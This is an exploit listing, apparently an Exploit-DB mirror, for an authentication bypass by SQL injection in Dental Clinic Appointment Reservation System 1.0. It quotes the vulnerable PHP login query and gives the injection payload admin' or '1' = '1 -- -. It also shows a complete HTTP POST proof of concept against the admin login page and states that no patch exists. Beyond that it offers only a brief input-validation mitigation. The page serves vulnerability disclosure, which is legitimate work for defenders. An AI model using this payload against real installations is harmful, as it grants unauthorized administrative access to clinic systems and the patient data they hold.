header-logo
Suggest Exploit
vendor:
Dental Clinic Appointment Reservation System
by:
Mesut Cetin
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Dental Clinic Appointment Reservation System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:dental_clinic_appointment_reservation_system
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu 18.04 TLS
2021

Dental Clinic Appointment Reservation System 1.0 – Authentication Bypass (SQLi)

Attackers can bypass the admin login page due to unsanitized user input and access internal contents. The vulnerable code is located in /admin/index.php, line 34, where the query is constructed without sanitizing the user input. The payload used is 'admin' or '1' = '1 -- -' which allows the attacker to bypass the authentication.

Mitigation:

Input validation should be used to ensure that user input is sanitized and does not contain malicious code.
Source

Exploit-DB raw data:

# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)
# Date: 12.05.2021
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Ubuntu 18.04 TLS

# Description:
# Attacker can bypass admin login page due to unsanitized user input and access internal contents
# vulnerable code in /admin/index.php, line 34:
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
# payload: admin' or '1' = '1 -- -

# Proof of concept:
http://localhost/admin/index.php

POST /admin/index.php HTTP/1.1
Host: localhost
Content-Length: 54
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; E6653 Build/32.2.A.0.253) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=3cjdtku76ggasqei49gng91p3p
dnt: 1
sec-gpc: 1
Connection: close

username=admin'+or+'1'%3d1+--+-&password=test&submit=

Navigation

Suggest Exploit

Services By CQR